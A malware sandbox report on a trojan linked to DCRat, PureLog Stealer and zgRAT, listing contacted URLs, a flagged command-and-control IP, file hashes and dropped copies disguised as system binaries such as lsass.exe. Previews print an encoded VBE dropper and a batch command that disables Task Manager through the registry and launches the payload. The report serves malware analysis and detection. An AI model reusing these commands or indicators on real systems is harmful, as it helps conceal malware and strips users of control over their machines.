http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000009.00000002.1664534357.000002834D579000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B5E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50A2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50FB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.2253982011.000002835D3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2239180479.000001745B432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2223892925.0000023A60873000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2206789838.000001FE60E02000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000010.00000002.2249119749.000001802BF32000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.microsoft.	powershell.exe, 0000000E.00000002.2416830415.000001FE68FB9000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	cef_process.exe, 00000008.00000002.1540575609.000000000377F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1664534357.000002834D351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1666938374.000001744B3C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1662472673.0000023A50801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662288918.000001FE50D91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1648871133.000001801BEC1000.00000004.00000800.00020000.00000000.sdmp, mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003686000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000010.00000002.1648871133.000001801C0E8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://91.199.45.187	mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://91.199.45.187/	mOBsSQwwQhAobhYfNDABCsnt.exe, 00000018.00000002.2622429711.0000000003701000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://crl.mi	powershell.exe, 0000000A.00000002.2496024811.00000174636CF000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.199.45.187	unknown	Netherlands		213325	SYSHEAD-ASDE	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1533405
Start date and time:	2024-10-14 17:21:16 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	kBY9lgRaca.exe renamed because original name is a hash value
Original Sample Name:	3bfa5607ba2fdb912bf3c1b06950be30.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@36/84@0/1
EGA Information:	Successful, ratio: 37.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 7800 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7808 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7824 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7856 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7904 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: kBY9lgRaca.exe

Simulations

Behavior and APIs

Time	Type	Description
12:35:01	API Interceptor	140x Sleep call for process: powershell.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\CNRzgtSC.log	d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	FMd6ntIhQY.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	ggJWCFp2S3.exe	Get hash	malicious	DCRat	Browse
	qM9xet97tX.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	NHd2wtJdTH.exe	Get hash	malicious	DCRat	Browse
	Z7q8C34yfN.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	VrKU8bWf4W.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	4NE6yDivAo.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	tSht4UNfrv.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse

Created / dropped Files

C:\Program Files (x86)\Java\jre-1.8\bin\9e8d7a4ca61bd9

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	142
Entropy (8bit):	5.565078109933982
Encrypted:	false
SSDEEP:	3:WuwKw+ht5AiLEw3nhKycOlmQg7tMQawtc+1i1IU/2pcK/CAujtswUvYy/N3m:p/DHY2nhVcOlmJtVRtc+g1IU/wcK/CAY
MD5:	F3445165607EB0B0CA907FAEF0357169
SHA1:	7940F27BF88B2A5575A19F8234731E68A7279346
SHA-256:	D32981558A287A25502E2B82C0C639916D2DBA55E682EDBC7FDD6C978DCB4A60
SHA-512:	47B2B36DB969B7C94A6200398399613B78A75C25C1782198F6FACD1239B1C8F8131E5632A76C3BC4B71DC5C1372D1FF991DF1BA24ED67DAA704DB83BDBE428C7
Malicious:	false
Preview:	EWXaKkPlIdkoUgXDHwoBeGmS29sqmjFf2fe5fLDoPF9882dlaMVd2Pn7uEhL2i9iXEvzCbi5s9vYGnU9fGPZOmmm1gLan2vqFbk3Goi8oZu2eO0HtipvSkUvcJ7fQHRzOFSpCa31hRvy1u

C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3728384
Entropy (8bit):	7.82563273886745
Encrypted:	false
SSDEEP:	98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
MD5:	C73DF0A231280439C24218C394E0A546
SHA1:	17DD69D2B9EA616CBE77FAFE23832168211C9F1A
SHA-256:	A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
SHA-512:	5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Java\jre-1.8\bin\RuntimeBroker.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...\|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....(.... ....8........0.......... ........8........E............\|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z8.... ....~....{....:B...& ....87...~....9.... ....~....{j...

C:\Program Files (x86)\WindowsPowerShell\Modules\6203df4a6bafc7

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	ASCII text, with very long lines (816), with no line terminators
Category:	dropped
Size (bytes):	816
Entropy (8bit):	5.911213246407105
Encrypted:	false
SSDEEP:	24:LilHNg/T4aKVxG1MrSUBn+xkSHURRMdDwl5:6O5cYKrZx6yMdDI
MD5:	08B10C2A1A855196B3E95908E06CC04B
SHA1:	40176925128CB9AC26932A841F60BD184A0251F7
SHA-256:	CF0BF90BD15F9C1E005C2786BF6EB44CE02D92A2E41B7633265A72253AA0ABB4
SHA-512:	05D6E5FEE72BE8327CC2687970C9F7082D8B89FF43650DB324B14EB92CE8DEB0F3EA107A29F50FD62E5832938BF320A77FE21C5F127178CB9314342E2F252451
Malicious:	false
Preview:	vopzyX2vAV7gpxE5DAf1NFTQQWuBYAC0c5QIhVAIvamcWkbnKjHVc0kpVYicm0XASHDuh5YrAWFxc04p5H1y2rXmUkxIwhg4CmJOhrGOKaVFuwNee2hf9iHluaZ6IQ5c0LuzrpINBmocWR2hWSn3AA5eeieGRJF4e3PjCXxzuTdW4pOci1kzmCbzPQVIKC61ht7dCTf8fyJrgjjzTCiajPScbZTvCoosXmzLrvZPVlTx2uSqqfyIefSRbfBn9u51JaU4uYHimSF75ejqGnEg0gO1TiuMtwPkpcncZY6SYPfLaVV65UgVpZAnMclLo5y0DeRd0HQsrwIkADa7MxQYQ35QcAP7wundbpI6D2GyDxo3QamJBn81oZkJjBB01T67IpJV4e4UrbVcPB9CXF5JvwyBF9XC0P6u1rulQROhtoKNEH3hB8cvYxLW1HP5H2dbekkiQYvF1YZHmk77FzA2xKVEfYuJBSZ0KssdhVRnNX4AXEtQKS0S1loUPfC2olDi8i732dZuiXoZQUrbod9tcH9iEYOCSZ9mTWCyH0Xq2Gud7OD4xlNKmUF1jZyePXbJYCG4S3UyFT0WXfk0UTOrLyA9QKOsC3afolF5HJl4RZETdtdDy7J6Iu7jBGnHolvM2VrwZosKrUZwurfhqK3EteW4nf3AfePpn1aIBrnJO8OyUKzUlGaesrdX8xI4vrpNFtI2QWf9htzuQhjcqiZZDu76YDKOjtYgTBtkC7EOlb781sHaNpNMSPKUwMdMMQZxUSaOy8aseKxlx8Ep6tB3gMOD1Yyzd2CUBJniS2lOPerHbigy

C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3728384
Entropy (8bit):	7.82563273886745
Encrypted:	false
SSDEEP:	98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
MD5:	C73DF0A231280439C24218C394E0A546
SHA1:	17DD69D2B9EA616CBE77FAFE23832168211C9F1A
SHA-256:	A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
SHA-512:	5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\WindowsPowerShell\Modules\lsass.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...\|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....(.... ....8........0.......... ........8........E............\|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z8.... ....~....{....:B...& ....87...~....9.... ....~....{j...

C:\Program Files\Microsoft\OneDrive\ListSync\settings\07a615e8f2b317

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	ASCII text, with very long lines (769), with no line terminators
Category:	dropped
Size (bytes):	769
Entropy (8bit):	5.911244960264821
Encrypted:	false
SSDEEP:	24:OAeJPcZoNFM/hx4qQ5jOD3oMPzffXRXwN:Ol+ZoNax0xOJXRXwN
MD5:	099F1D279C83BB2D9D7F76D176CC073E
SHA1:	F23E2C1FCE9E4D6F134B6EEC901BC999E66A0312
SHA-256:	A431FB52177D772A1F20C969B5D9DF9CA04FCFE4FFC87FBF5C68F2F538C47F6D
SHA-512:	B48062ABFBC890CD1DB0A6700D8E5C89CE804F9F8B1361F4A02E912AFE90E3F8BF9ABE627056541F765171177F77CB074F5DB0FE91B64DD3F353FE8ADDFD5246
Malicious:	false
Preview:	5U73RlABYzeDKtDO3XGQmoPLXVdqEjk9PXnoj9GOeOSzzH2YEiU85lIRFvf5HT7zOfyxFZo4R1vYWZWPcElgPmDnOVjydLGLQckUTFSp3ZrD0u5pYPdCrbkmbKiu00aGvkH3zC6Xw6mz5Axea4ZNsDdz283JgizD9lSQmCzWTFQvyvrbXET5aMXrHSB1Iw1OGjzUrg1YED3mwrAGRcvbO3mwNkJUA8NgNCoP5Xt0M51WSv4ZR4kqBZ9N6CGGXgXFzXYuDvL3s4PTBPdcqtDGYhfyDbS3Qmcphwh5WKWftq7GKpLqioaodQrS1krlcSnFcjvPsiFfXhXsjZnXPlUlMyMREOEvcuCbC2ol367Ai4Q529tc7TW17C3nWeKedUDmf6pruBdTnTCRhQYFflxIYLd98AOYvdhO1oa6TBr5zCNoAlGGGF92g4OTdpsuxFiKwya30bvd41SV8y9X4IRpepr7ZHcoT7IueC2LLMQpTf7pl2UppVzox2qHGcds8HK6ti155xLr2mW8rCVgwx87Hd7lWvFsshqLVB5DBYt1KHwKgrZEG76LJMyPkPjKsc8U6KmpGSeXDGx9qxFoVAlvleCINpcwzjJrJbNVEu7yciHCZyixJ4yr0NtcIecazsie7F0PjujlDxTCW9tYGpn4vb06svNkSg9uAnFT7TOYVNoD3rFIuETJEnsfP4gyh8TgxiCs3aaxbOjhxxCBpE0OMzpW4jECwZ1W4HPUoWPUngszELsc2fIcIFT83pyTVXABW

C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3728384
Entropy (8bit):	7.82563273886745
Encrypted:	false
SSDEEP:	98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
MD5:	C73DF0A231280439C24218C394E0A546
SHA1:	17DD69D2B9EA616CBE77FAFE23832168211C9F1A
SHA-256:	A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
SHA-512:	5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\mOBsSQwwQhAobhYfNDABCsnt.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...\|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....(.... ....8........0.......... ........8........E............\|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z8.... ....~....{....:B...& ....87...~....9.... ....~....{j...

C:\Program Files\Windows Portable Devices\07a615e8f2b317

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	ASCII text, with very long lines (397), with no line terminators
Category:	dropped
Size (bytes):	397
Entropy (8bit):	5.7957847317711835
Encrypted:	false
SSDEEP:	12:yeSSlKy7vf8Rks8zoQ56pyHFTGjDws1fUj:yeSSKkDrX6pylTGjDws1fUj
MD5:	E3BB3C61CC839C60F14D15BAC4DCE584
SHA1:	674C156BFE143313EB9E447DA4ECE6AEE51CC929
SHA-256:	418525BD884D71DB20B0208E0D9C66F300296D65161C21C436CF60E04DB258E5
SHA-512:	FD90269AC1B00561B477A3E2A85212A74893AEF9053E482DAA6404F6B7DF422BD419905646660F55B6728ECC31ECD61A53622815ADB54AA340E83F86B195CA58
Malicious:	false
Preview:	ArwURIHhX7uOxKAIqIlRm1geSeaxsV68XQM6FdCoDz9TENFcn9t2ZhvIKRBwsUzBBw1g8EDMF6Ow2NaEZ7KsmDizeDwxcQ6sA8SRWidi6gxcS9Q616XuJGZ7NBC5RPuzAfv35Js0elwFQGgewz6f2Lj3iUDUgiQqw8bwNWBsOhQiUUrHfhIcTP6z62VkFXU5UFTSotRZyNRV5BjOn6z8ZyWgCm0VBam0MUNOBZcvQtoF8k35SH7JhVfgswQB35YXkaIkyUMOdEsqKRibt4D3ddS1zqfPIb1UUQehbTH74sqdnzWbNyS82e4HHRvHz7FBNXV4wB9ZxF8uxzO9UDBUI2czVXaKiAI7noQPdbpMz2LxfKTSCvwv5v2U4giYly1x7BHJi8g2XzfQq

C:\Program Files\Windows Portable Devices\mOBsSQwwQhAobhYfNDABCsnt.exe

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3728384
Entropy (8bit):	7.82563273886745
Encrypted:	false
SSDEEP:	98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
MD5:	C73DF0A231280439C24218C394E0A546
SHA1:	17DD69D2B9EA616CBE77FAFE23832168211C9F1A
SHA-256:	A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
SHA-512:	5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...\|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....(.... ....8........0.......... ........8........E............\|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z8.... ....~....{....:B...& ....87...~....9.... ....~....{j...

C:\RuntimeDll\07a615e8f2b317

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	ASCII text, with very long lines (368), with no line terminators
Category:	dropped
Size (bytes):	368
Entropy (8bit):	5.837753117001376
Encrypted:	false
SSDEEP:	6:sziKBt3ma11GOQmXpG5DqvJadaNvZb0rMM1zOfdH3TbOVJDno3wNhmG5vdYFsvdc:qiat3mW1YgIVaNvZb0rj6H3n6JDowNRM
MD5:	2E3C6FB7548F5E444E12BAF401F7F26B
SHA1:	911A2849088E42537946FE6AF53BE0A7082C49F8
SHA-256:	1C4C033D6381E7A07D655FAF7F9B8ED22B903DB6EF71D2694FC79A538DE89538
SHA-512:	EB65DE1A277CF079760EFE8838187C2A4702C0244603CF17596FF24E56169B3B944E1BD29D827922373121805A55F81E8A905BB634B51843CB4CB6EFCE8A7913
Malicious:	false
Preview:	TzfkqGzRt1mKQRZNzyRb9i58Pfrd2hD4LJznnen1DXEctNtt78x0PPXu3gUKZWZLxr9HcvkVLZYledPCw7f3uMo5wEtGJccq82oCNmRLXcp01wQaRSYc0fblCEVXCeLs7rmlyNyJpUgRgyD9yTy0EA0cbC9JQ4J3R72KJomEdOwg9KFNAVitpUo71JKvNo2vLnAj630KruWzNTdQ7vI5VaN6T4S9d00zVAVWKgRHfYC47ythq4xcf7avZDPBk0q04hdN8HGbeBZ7YS8eLvTjCXTYkk6GQQhorLAZVgjjxV8ehcWHFv0zhGxgOFnYK9LOdvQMSiIoLtwqZy0HNzBeZsGkXdLQ3LYyKuBwMKygnLnxUHHa

C:\RuntimeDll\PBs3ExWWgPs.vbe

Download File

Process:	C:\Users\user\Desktop\kBY9lgRaca.exe
File Type:	data
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.860016912730047
Encrypted:	false
SSDEEP:	6:G5kgwqK+NkLzWbHOurFnBaORbM5nC3vzUwxRO1:G6BMCzWLOuhBaORbQCG1
MD5:	BE5DDFF739C82382BCAA23FEA71385F1
SHA1:	ECD0C6DD561A1E81ADEF7D8CD2DB504F89155B4D
SHA-256:	A5543AF635193AEA2FFA449EE70D9FAC5AAAFE4F880287E9905380B5949969E5
SHA-512:	1E108A7DAC6F6772DB919EAEDEA876846E50787030C84752F08396B6A728299C2CB9156DED22D7FACC1952A2BA2C1667552F5C07FE53002BA1708856CFC85138
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	#@~^xAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFX!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ@#@&q/4j4+Vs "EUPr/=z]!xDk:.f^szJ+.xhnLKs!.2N\GCbzqoM..(5sO/"90mc8lDJS~Z~PWC^/nRT4AAA==^#~@.

C:\RuntimeDll\cef_process.exe

Download File

Process:	C:\Users\user\Desktop\kBY9lgRaca.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3728384
Entropy (8bit):	7.82563273886745
Encrypted:	false
SSDEEP:	98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
MD5:	C73DF0A231280439C24218C394E0A546
SHA1:	17DD69D2B9EA616CBE77FAFE23832168211C9F1A
SHA-256:	A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
SHA-512:	5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\RuntimeDll\cef_process.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e..................8...........8.. ....9...@.. .......................@9...........@...................................8.K.....9.p.................... 9...................................................... ............... ..H............text...4.8.. ....8................. ..`.rsrc...p.....9.......8.............@....reloc....... 9.......8.............@..B..................8.....H.......D...8.......s...\|.......W.8......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{m...:....& ....8....(.... ....8........0.......... ........8........E............\|.......F.......8........~....(X...~....(\... ....?`... ....~....{....9....& ....8....~....(P... .... .... ....s....~....(T....... ....8g...r...ps....z8.... ....~....{....:B...& ....87...~....9.... ....~....{j...

C:\RuntimeDll\er5JwegoF0epdZ7Hiy1grVzXqFtCRJ8c.bat

Download File

Process:	C:\Users\user\Desktop\kBY9lgRaca.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	183
Entropy (8bit):	5.3824312269645995
Encrypted:	false
SSDEEP:	3:KPYqACFoBZwXD9so3KRfyM1K7eB/k+7W34hebJNAKyMhF7FKLNBROMWD6bAtqx4d:HStuH1jhRiI36B7tqx4d
MD5:	69496B5B77E0101F9E89BFEB54B8B900
SHA1:	45A51BF9904F2C5694460A1EA5D4390C91E287F5
SHA-256:	12E552DE8C5C53B37509AB351E7374AAFC7F2CA5DA6D97E8854CF6798F94620F
SHA-512:	3D4965F2516A47223F65489E29460206C3A75681949DCC3F5969D44DF1001FAF02EF5EB9662E169F4C552D178BD48438E4DBBAAFB905EB8347EF3E564D021F61
Malicious:	false
Preview:	%GOjFfqJOCNfuO%reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f%yhrHH%..%aCiIIESJ%"C:\RuntimeDll/cef_process.exe"%TJmHQuc%

C:\RuntimeDll\mOBsSQwwQhAobhYfNDABCsnt.exe

Download File

Process:	C:\RuntimeDll\cef_process.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3728384
Entropy (8bit):	7.82563273886745
Encrypted:	false
SSDEEP:	98304:WsTpZJfis3FhJEqWkGcVGPMcFlEpxaomYYVVLWgP:WsrUK/JEqWQVGUcF6aomYYTD
MD5:	C73DF0A231280439C24218C394E0A546
SHA1:	17DD69D2B9EA616CBE77FAFE23832168211C9F1A
SHA-256:	A06A177434AF67F4E36920FBE4CD113AC117B41ED675C887382F42B179849A09
SHA-512:	5BE2417FE44E4AFE43F355F36AB88346487E1960DFC32B82A06A132F02760840C965925EBC6CE842998ED8D4E507B2E23528C123CD2C3EF0FD3D5F289D19B297
Malicious:	true
